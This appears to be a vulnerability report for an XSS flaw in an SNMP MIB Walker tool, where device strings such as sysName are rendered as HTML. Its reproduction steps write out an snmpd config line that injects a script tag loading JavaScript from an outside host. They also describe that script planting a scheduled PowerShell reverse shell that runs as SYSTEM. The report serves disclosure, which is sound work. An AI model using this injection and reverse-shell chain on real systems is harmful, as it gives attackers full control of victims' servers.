Improper validation of strings returned by SNMP devices in the SNMP MIB Walker makes the application prone to a reflected XSS attack: values such as sysName are rendered as HTML, so a device under attacker control can inject a script tag.
Steps To Reproduce:
Modify the script below to run a reverse shell. You can base64-decode my payload, change the IP and port, then base64-encode it again and put it back in the script. Or run another payload, of course.
Save the script on a web server
Add an XSS payload pointing at the URL of the script to the snmpd config; I placed it in sysName:
sysContact Me <email@example.com>
sysName LinuxPC<script src='https://f20.be/t.js'/>
Open the SNMP MIB Walker tool and "walk" the IP address of the Linux computer
Function of the script
It creates a scheduled task that runs PowerShell, containing a reverse shell in this example
The task is triggered to run every five minutes
The attacker will have remote code execution as the NT AUTHORITY\SYSTEM account, i.e. full control of the server.